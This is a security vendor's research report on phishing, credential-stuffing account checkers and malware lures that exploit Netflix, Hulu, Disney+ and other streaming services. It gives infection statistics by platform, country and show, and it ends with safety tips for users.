One of the oldest, and most effective, ways for stealing account credentials is through phishing. These criminals might not even be after access to your streaming account. Once they have your email address and password, they can use this information for various purposes: launching other spam or phishing attacks, gaining access to your other accounts (many times, people reuse passwords), or retrieving the billing and credit card information associated with the account.

Phishing scams related to streaming platforms include creating imitations of login pages as a way to harvest credentials. Netflix remains the most popular target. Kaspersky researchers found fake Netflix login pages in four different languages: French, Portuguese, Spanish, and English. They also found imitations of Hulu.

Fake login page for Netflix in Spanish

Fake Hulu login page

With the launch of Disney +, cybercriminals found a new target: they began creating phishing pages to target potential customers.

Phishing page urging users to register for a free Disney + account in Italian

Such phishing scams are not surprising. In 2019, Kaspersky noted that criminals were more frequently exploiting major sporting and entertainment events to launch attacks. Users are baited with offers like free access to the final Game of Thrones season; to proceed, all they need to do is create a free account and enter their billing information. These criminals used the same scheme when Disney + was launched to try to steal financial information.

A fraudulent offer for a free one-year subscription to Disney +. If the user continues, they are prompted to input payment details including the security digits on their credit card

Another common financially motivated type of attack revolves around tricking users to confirm their payment details or add their billing info. Of course, once this is done, the criminals gain access to the funds associated with the victims’ credit card and/or bank account. These attacks come both in the form of phishing pages created to look like they are from the actual platform (see below) and emails sent to users’ accounts.

Left: a fake Netflix payment page requesting a new payment method be added. Right: a phishing scam asking the user to add their billing info to their Hulu account.

The content of the emails is similar: users are warned their payment method is either outdated or must be confirmed, and, unless they update it soon, their account access or membership will be suspended. Those who fall for such scams are vulnerable to exposing their account credentials, bank account information, and credit card details.

Phishing email asking the recipient to provide a new, valid payment method for their Amazon Prime account

Phishing is an old—and often successful—method for cybercriminals to earn money quickly and easily. Given that the number of streaming service subscribers will only increase, it is likely the number of phishing scams related to these platforms and the number of platforms targeted will only grow.

Download your favorite streaming app—and some malware

Streaming services not only provide a prime target for spam and phishing scams, but they also come in handy when trying to deliver malware. Of course, those who subscribe to streaming services through official channels and only use approved versions of the apps can, in most cases, avoid accidentally downloading malware or other threats. But those that look to receive access—by “hacking” accounts, downloading free versions, or collecting free subscriptions—are far more susceptible to downloading various threats in addition to access. Subscribers are not immune either. They can encounter malware when attempting to download any unofficial or modified version of the app (say, Netflix with a black, instead of a red, background). They can also fall prey to malware if cybercriminals attempt to steal their account credentials.

The number of unique Kaspersky users that encountered various threats containing the names of legitimate platforms as a lure while trying to watch popular streaming platforms through unofficial means are as follows:

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Graph depicting the number of unique users that encountered various threats containing the names of popular streaming platforms while trying to gain access to these platforms through unofficial means between January 2019 and April 8, 2020 (download)

Netflix was by far the most common platform used by criminals as a way to lure users into downloading various threats, with Hulu being the second most popular and Amazon Prime, the third. Only 28 users encountered various threats while trying to watch Disney + through unofficial means and none, when trying to watch Apple TV +.

Disney + is a newer service, which partially explains the low numbers. In addition, it is available in far fewer countries than both Amazon Prime and Netflix: fifteen as opposed to more than 100. On the other hand, because Hulu is only available in the United States, anyone outside the country who wants to watch it has to do so via unofficial means, increasing their chances of encountering threats.

The virtual absence of Apple TV + may be due to the fact that many people received a free yearly subscription: all they had to do was buy new Apple TV hardware or any Apple device no earlier than September 10, 2019. Since most malware is downloaded when users try to gain access without a paid subscription, the more people get access to the service, the less malware is downloaded. While users may encounter malware as they try to convert DVD content or videos to a format that works on Apple TV—if they already have an Apple TV—they do not need to scour unofficial sources for a way to watch Apple TV +.

In addition, Apple TV + has struggled to gain a foothold in the streaming battle. Research suggests that fewer than ten percent of the users eligible for the free one-year subscription actually took advantage. And, while being available in more than 100 countries, there could be as little as ten million subscribers. Given its relatively low popularity, it is not surprising that it is not a source of significant malware activity.

The total number of attempts to infect users trying to gain access to popular streaming platforms via unofficial means by using the names of these platforms as a lure was 23,936.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Graph depicting the number of attempts to infect users trying to gain access to popular streaming platforms by using the names of these platforms as a lure between January 2019 and April 8, 2020

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Percentage distribution of different types of threats disguised under the name of popular streaming platforms encountered by users between January 2019 and April 8, 2020

The most common threat encountered by users while trying to watch streaming platforms through unofficial means (47%) is also the most dangerous: the trojan. These types of malicious files allow cybercriminals to do everything from deleting and blocking data to interrupting the performance of the computer. Some of the trojans distributed were spy trojans, particularly dangerous malicious files that track the user’s actions on the infected device. With spyware, users are susceptible to having their personal files and photos collected, along with login and password information for their financial accounts.

The second most common threat encountered was “not-a-virus“: either riskware or adware. Riskware can range from download managers to remote administration tools, and adware does exactly what it sounds like, i.e. bombards users with unwanted ads.

Somewhat alarming is the sizable percentage of users that encounter backdoors. These malicious files allow criminals to gain remote control over the device and carry out nearly any tasks they desire, including making the computer part of a botnet or zombie network.

Threats Encountered Per Region Countries with the Greatest Number of Registered Attacks: Hulu Dominican Republic 10.5% United States 10.4% Indonesia 5.6% India 4.9% China 4.5%

Threats that are spread under the name Hulu as a lure to those trying to watch the platform through unofficial means are distributed worldwide. The second greatest number of attacks came from United States, which is not surprising. Given that it is a US service, it is well-known in the country, meaning it would be a popular target for cybercriminals.

Countries with the Greatest Number of Registered Attacks: Netflix Germany 11.2% Algeria 8.2% India 7.8% Brazil 7.8% France 4.3%

For Netflix, users worldwide encounter various threats. The greatest number of attacks came from Germany. This could be due to the fact that Germany is one of the ten most popular countries for Netflix.

Countries with the Greatest Number of Registered Attacks: Amazon Prime Video United States 36.5% India 17.8% Germany 15.1% Brazil 4.3% Philippines 2.8%

Users around the world encounter threats when attempting to watch Amazon Prime Video through unofficial means, with the largest number of attacks coming from the United States (36.5%), Amazon’s biggest market. Germany is Amazon’s largest foreign market, which explains the high number of users that encounter various threats, and India became a major focus for Amazon in 2018. As much as 76.5% of all attacks that contained mentions of Amazon Prime came from these five countries.

Countries with the Greatest Number of Registered Attacks: Disney + Algeria 30% Netherlands 14% Saudi Arabia 8.5% India 7.7% Ireland 7.7%

The greatest number of infection attempts registered that used the name Disney + came from Algeria (30%). The service is not available in Algeria, meaning anyone who tries to watch it must do so illegally, increasing their chances of encountering malicious files. The same is true for Saudi Arabia.

A Closer Look at Checkers:

At the same time Disney + subscribers were finding out their accounts had been hacked and they were locked out, those same accounts started popping up on hacker forums. In fact, selling streaming service accounts on the black market is big business, dating back years. Anyone interested in purchasing a streaming service account can simply search “Free Netflix Accounts” or “Purchase Cheap Hulu Subscriptions” in their Google browser and numerous results will pop up. There are whole websites dedicated to the sale of discounted account logins.

Credentials are harvested in a number of ways. The most common one is through phishing emails and fake websites (see above). In 2016, Trend Micro uncovered a scheme where Netflix users were tricked into clicking on malicious links sent via email; once clicked, the attached malware automatically collected their account login information. Using this scam, the attackers collected more than 300,000 passwords which they then sold.

A common attack tool of choice for collecting credentials is something called “account checker”. Account checkers test passwords that have been uncovered from a breach or dump site on different websites to see if they provide access to an account. Once a matching pair is found (say an email and password for a working Amazon Prime account), the criminals can take over the account, along with any financial information stored within, and sell the credentials online.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Graph depicting the number of unique users that encountered various threats bundled with account checkers for popular streaming platforms between January 2019 and April 8, 2020 (download)

Not only do professional criminals use checkers, but those simply looking for streaming account access can also encounter them, whether intentionally or unintentionally. Unfortunately, such tools often come bundled with different types of threats, including malware. Between January 2019 and April 8, 2020, 6,661 Kaspersky users encountered various threats when coming across account checkers while looking for ways to gain access to various streaming platforms. In total, there were 57,784 attempts by criminals to infect these users through account checkers. Once again, Netflix was the most frequently targeted platform for account checkers, with 6,292 users being exposed to cyberthreats in this way and 52,899 infection attempts registered.

The second most common platform for users to encounter threats on when coming across account checkers was Hulu. This could, once again, be attributed to the fact that currently, Hulu is only available in the United States. That means that for many, the only way to gain access is by either harvesting credentials or purchasing free subscriptions.

When it comes to Amazon Prime, few users encountered threats associated with account checkers. This might be due to the subscription model of Amazon: Amazon Prime Video comes as part of a bundle for any Amazon account holder that has a Prime subscription. Those looking to gain access to Amazon Prime Video might be looking for credentials for general Amazon accounts, rather than Amazon Prime Video in particular.

No users encountered threats from account checkers associated with Apple TV +. Of course, this might be due to the fact that Apple was giving away free one-year subscriptions.

The threat behind original content

Streaming services like Netflix made their name not only from streaming third-party movies and TV shows but producing their own content. Some of Netflix’s most popular shows are originals, and it will pay an estimated $17.3 billion for original content this year. Services like Apple TV + followed suit; the latter invested $6 billion in its original content for the launch. For those who want to see these original shows without paying $5-$10 dollars a month for a subscription, the only way to watch them is by downloading them from a third party. This, of course, carries a risk of downloading malware.

In terms of the number of unique users affected, the ten original shows (among the 25 mentioned in the Methodology section of this report) most frequently used by criminals as a lure to distribute various threats, including malware, were as follows:

The Mandalorian (Disney +) 1614 Stranger Things (Netflix) 1291 The Witcher (Netflix) 1076 Sex Education (Netflix) 420 Orange is the New Black (Netflix) 253 Ozark (Netflix) 177 The Man in the High Castle (Amazon Prime Video) 142 The Expanse (Amazon Prime Video) 119 Fleabag (Amazon Prime Video) 102 Castle Rock (Hulu) 99

The ten original shows from Amazon Prime, Apple TV +, Hulu, Netflix, and Disney + most frequently used as a lure to distribute various threats, and the number of unique users that encountered various threats

The show most frequently used as a lure was The Mandalorian (1614), an original show launched by Disney + in 2019. It became the platform’s first original hit, and the most in-demand streaming series in the November of last year. Stranger Things (1291), followed closely by The Witcher (1076), had the second and third greatest number of users that encountered various threats, respectively. Sex Education was a distant fourth with 420. When it comes to the ten original shows used as a lure where the greatest number of users encountered various threats, five came from Netflix, three from Amazon Prime Video, one from Hulu, and one from Disney +.

Netflix has the largest catalogue of original content, so it is not surprising that its shows would more frequently be used to disguise malicious files. Stranger Things is one of the most popular shows on the platform: the launch of its third season witnessed a record of 26.4 million viewers in just four days. The Witcher was also a huge hit for Netflix, with reportedly 76 million people worldwide watching at least the first two minutes. Sex Education, which has two seasons, had an estimated 40 million viewers for the first season.

A closer look at the five shows most frequently used as a lure:

As many as 4,502 Kaspersky users encountered malware spread under the guise of the five shows most frequently used as a lure by criminals (The Mandalorian, Stranger Things, The Witcher, Sex Education, Orange Is the New Black). The first is a Disney + original, while the other four are from Netflix.

There was a total of 18,947 attempts to infect these users utilizing the above five shows as a lure, with the greatest number of attempts using the name The Mandalorian (5855).

The distribution of the specific threats encountered is as follows:

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Percent distribution of the different types of threats encountered by users disguised under the name of one of the five most popular shows used as a lure by criminals (download)

Nearly two thirds of the threats encountered (74%) were trojans. The types of trojans varied widely and included everything from spy trojans, trojan droppers, and trojan downloaders, to ransomware trojans, banking trojans (those designed to steal money from your account), and Trojan-PSWs (those designed to steal logins and passwords). The second most common threat encountered were “not-a-virus” files. A small number of generic malware (Dangerous Objects), backdoors, and exploits were also among the malicious programs encountered.

The countries where the greatest number of various threats distributed under the guise of these five shows were detected are as follows:

Spain 51.2% Russia 17.6% India 2.7% South Africa 2% Belarus 1.9% Ethiopia 1.8% Algeria 1.8% Turkey 1.5% Kenya 1.4% Philippines 1.4%

The ten countries where the greatest number of attacks disguised under the name of one of the five shows most frequently used as a lure by criminals were registered (i.e. The Mandalorian, Stranger Things, The Witcher, Sex Education, and Orange Is the New Black)

More than half of the attacks registered that were disguised under the name of one of the five shows most frequently used as a lure came from Spain. In March, Disney + announced that it would be entering into a strategic alliance with Spain’s Telefónica, one of the world’s largest telephone operators, to launch the country’s biggest subscription video on demand service, Movistar Plus. Most likely, this means that Disney + has attracted significant attention in Spain, and thus, it is not surprising a large number of people would want to download its most popular show. In addition, Netflix is the second largest pay television platform in Spain after Movistar.

A significant portion of the attacks (17.6%) came from Russia, while the third greatest number came from India. Disney + launched as part of India’s local streaming service Hotstar and was reported to have amassed eight million subscribers by April. Netflix has also expanded significantly in India, as well, over the past several months.

Looking Ahead

The streaming wars have only just begun, and so too has the varied cybercrime associated with it. The global pandemic and subsequent surge in subscribers have only provided an additional impetus for cybercriminals to target these platforms.

A growing number of platforms also makes users more vulnerable to cyberattacks: the more subscriptions users have, the harder it is to monitor them for suspicious activity, especially if one is no longer used but the subscription remains active. In addition, people tend to reuse passwords, meaning if criminals gain credentials for one account, they could potentially use the same information to access other streaming accounts—and collect the personal and financial information affiliated with them as they go.

What is more, purchasing streaming content is becoming a big expense. Each individual subscription can range from $6 to $12 a month. In fact, if you wanted access to all five of the streaming platforms analyzed here, it would cost you $36.00 dollars a month—and that does not include subscriptions to any other local channels or local platforms. The more platforms there are, the more subscriptions users will need to purchase to watch all their favorite content, meaning the more they will have to spend—money they might not have. In other words, the more expensive streaming becomes, the more users will be inclined to find less expensive ways to access these services by purchasing discounted accounts, using account checkers, falling for free subscriptions scams, etc. This makes them more vulnerable to malware and other cyberthreats.

In terms of the platforms most frequently used as a lure when tricking users into downloading various threats, Netflix is still by far the most frequently targeted—whether it is luring people who are trying to gain access to the platform or watch its original shows. Worldwide, Netflix has the greatest number of subscribers (it is hard to know how many people watch Amazon Prime Video because Amazon simply counts the total number of Prime members). However, this could change as newer platforms increase their subscriber base. Disney + amassed 54.5 million subscribers in just sixth months, signaling that it could become a huge competitor to Netflix. As certain shows and platforms shift in popularity, so will the prime targets of cybercriminals attacks.

No matter which platform or show you choose to watch, it is important to take certain precautions to stay safe.

In order to stay safe from phishing scams related to streaming platforms, Kaspersky experts recommend:

  • Look carefully at the sender’s address: if it comes from a free email service or contains meaningless characters, it is most likely fake.
  • Pay attention to the text: well-known companies would not send email with poor formatting or bad grammar.
  • Do not open attachments or click links in emails from streaming services—particularly, if the sender insists upon it. It is better to go to the official website directly and log in to your account from there.
  • Be wary of any deals that seem too good to be true, such as a “one-year free subscription”.
  • Do not visit websites until you are sure they are legitimate and start with “https”.
  • Once on the website, check that it is authentic:
    • Double-check the format of the URL or the spelling of the company name, as well as read reviews and check the domain’s registration data before starting any downloads.
  • Use a reliable security solution like Kaspersky Security Cloud that identifies malicious attachments and blocks phishing sites.

To protect yourself from malware when trying to watch streaming platforms or their original series:

  • Whenever possible, only access streaming platforms via your own, paid subscription on the official website or app from official marketplaces.
  • Do not download any unofficial versions or modifications of these platforms’ applications.
  • Use a different, strong password for each of your accounts.
  • Using a reliable security solution like Kaspersky Security Cloud that delivers advanced protection on all your devices.